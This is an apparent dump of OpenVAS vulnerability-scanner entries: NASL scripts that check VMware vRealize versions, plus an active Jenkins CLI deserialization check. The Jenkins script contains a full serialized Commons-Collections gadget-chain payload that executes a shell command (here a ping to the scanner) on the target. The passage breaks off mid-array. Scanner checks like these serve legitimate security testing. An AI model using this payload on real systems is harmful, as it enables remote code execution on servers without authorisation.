script_tag(name:\"solution\", value:\"Upgrade VMware vRealize Operations 6.2 or\n later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!vmVer = get_app_version(cpe:CPE, port:vmPort)){\n exit(0);\n}\n\n## vulnerable version 6.x before 6.2\nif(vmVer =~ \"^(6\\.)\")\n{\n if(version_in_range(version:vmVer, test_version:\"6.0\", test_version2:\"6.1\"))\n {\n report = report_fixed_ver(installed_version:vmVer, fixed_version:\"6.2\");\n security_message(data:report, port:vmPort);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:55", "description": "This host is running VMware vRealize\n Orchestrator and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "VMware vRealize Orchestrator Remote Code Execution Vulnerability - Apr17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310811005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811005", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_orchestrator_code_exec_vuln_apr17.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# VMware vRealize Orchestrator Remote Code Execution Vulnerability - Apr17\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_orchestrator';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811005\");\n script_version(\"$Revision: 11863 $\");\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 18:03:53 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"VMware vRealize Orchestrator Remote Code Execution Vulnerability - Apr17\");\n\n script_tag(name:\"summary\", value:\"This host is running VMware vRealize\n Orchestrator and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a deserialization error\n involving Apache Commons-collections and a specially constructed chain of\n classes exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of current user.\");\n\n script_tag(name:\"affected\", value:\"VMware vRealize Orchestrator 6.x before\n 6.0.5, 4.2.x and 5.x\");\n\n script_tag(name:\"solution\", value:\"Upgrade VMware vRealize Orchestrator to\n version 6.0.5 or apply patch available from vendor.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # unreliable as patch is also available\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_vmware_vrealize_orchestrator_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/orchestrator/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!vmVer = get_app_version(cpe:CPE, port:vmPort)){\n exit(0);\n}\n\n##4.2.x, 5.x\nif(vmVer =~ \"^(4\\.2\\.)\" || vmVer =~ \"^(5\\.)\")\n{\n VULN = TRUE;\n fix = \"Apply Patch from Vendor\";\n}\n\n## vulnerable version 6.x before 6.0.5\nif(vmVer =~ \"^(6\\.)\")\n{\n if(version_in_range(version:vmVer, test_version:\"6.0\", test_version2:\"6.0.4\"))\n {\n VULN = TRUE;\n fix = \"6.0.5 or Apply Patch from Vendor\";\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:vmVer, fixed_version:\"6.0.5\");\n security_message(data:report, port:vmPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:51", "description": "Jenkins is prone to remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8103"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310105820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI RMI Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105820\");\n script_bugtraq_id(77636);\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-10-17T11:27:19+0000\");\n\n script_name(\"Jenkins CLI RMI Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77636\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2015/q4/241\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which executes a ping against the scanner.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run arbitrary code on the Jenkins master.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Jenkins is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line before 1.638, Jenkins LTS before 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 12:45:35 +0200 (Fri, 22 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/jenkins_cli\", 50000);\n script_mandatory_keys(\"jenkins/detected\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nport = get_kb_item( \"Services/jenkins_cli\" );\nif( ! port )\n port = 50000;\n\nif( ! get_port_state( port ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nheaders = raw_string( 0x00,0x14,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x3a,0x43,0x4c,0x49,0x2d,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74 );\nsend( socket:soc, data:headers );\nrecv = recv( socket:soc, length:512 );\n\nif( ! recv || \"JENKINS\" >!< recv ) {\n close( soc );\n exit( 0 );\n}\n\n# Used to confirm the vulnerability\nvtstrings = get_vt_strings();\nvtcheck = vtstrings[\"ping_string\"];\n\npayload = raw_string( 0x3c,0x3d,0x3d,0x3d,0x5b,0x4a,0x45,0x4e,0x4b,0x49,0x4e,0x53,0x20,0x52,0x45,0x4d,0x4f,0x54,0x49,0x4e,0x47,0x20,0x43,0x41,0x50,0x41,0x43,0x49,0x54,0x59,0x5d,0x3d,0x3d,0x3d,0x3e );\n\nex += raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nif( host_runs(\"Windows\") == \"yes\" )\n{\n cmd = 'ping -c 5 ' + this_host();\n win = TRUE;\n}\nelse\n cmd = 'ping -c 5 -p ' + hexstr(vtcheck) + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\nex += len + cmd + raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,\n0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);\n\nex = base64( str:ex );\n\npayload += ex;\npayload += raw_string( 0x00,0x00,0x00,0x00,0x11,0x2d,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1b,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x55,0x73,0x65,0x72,0x52,\n 0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,0x4c,0x00,0x10,0x63,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x50,0x72,0x6f,0x78,\n 0x79,0x74,0x00,0x30,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,\n 0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x3b,0x5b,0x00,0x07,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x02,0x5b,0x42,0x4c,0x00,0x08,\n 0x74,0x6f,0x53,0x74,0x72,0x69,0x6e,0x67,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x78,0x72,0x00,0x17,0x68,0x75,\n 0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,0x49,0x00,0x02,\n 0x69,0x64,0x49,0x00,0x08,0x6c,0x61,0x73,0x74,0x49,0x6f,0x49,0x64,0x4c,0x00,0x08,0x72,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x74,0x00,0x1a,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,\n 0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x3b,0x78,0x72,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x09,0x63,0x72,0x65,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x00,\n 0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x3b,0x78,0x70,0x73,0x72,0x00,0x1e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,\n 0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x24,0x53,0x6f,0x75,0x72,0x63,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,\n 0x00,0x06,0x74,0x68,0x69,0x73,0x24,0x30,0x74,0x00,0x19,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,\n 0x3b,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xd0,0xfd,0x1f,0x3e,0x1a,0x3b,0x1c,0xc4,0x02,0x00,0x00,\n 0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0xd5,0xc6,0x35,0x27,0x39,0x77,0xb8,0xcb,0x03,0x00,0x04,0x4c,\n 0x00,0x05,0x63,0x61,0x75,0x73,0x65,0x74,0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0x3b,0x4c,0x00,0x0d,0x64,\n 0x65,0x74,0x61,0x69,0x6c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x71,0x00,0x7e,0x00,0x03,0x5b,0x00,0x0a,0x73,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x74,0x00,0x1e,0x5b,0x4c,\n 0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x4c,0x00,0x14,0x73,0x75,0x70,0x70,\n 0x72,0x65,0x73,0x73,0x65,0x64,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x73,0x74,0x00,0x10,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x4c,0x69,0x73,0x74,0x3b,\n 0x78,0x70,0x71,0x00,0x7e,0x00,0x10,0x70,0x75,0x72,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,\n 0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x02,0x46,0x2a,0x3c,0x3c,0xfd,0x22,0x39,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x0c,0x73,0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,\n 0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x61,0x09,0xc5,0x9a,0x26,0x36,0xdd,0x85,0x02,0x00,0x04,0x49,0x00,0x0a,0x6c,\n 0x69,0x6e,0x65,0x4e,0x75,0x6d,0x62,0x65,0x72,0x4c,0x00,0x0e,0x64,0x65,0x63,0x6c,0x61,0x72,0x69,0x6e,0x67,0x43,0x6c,0x61,0x73,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x08,0x66,\n 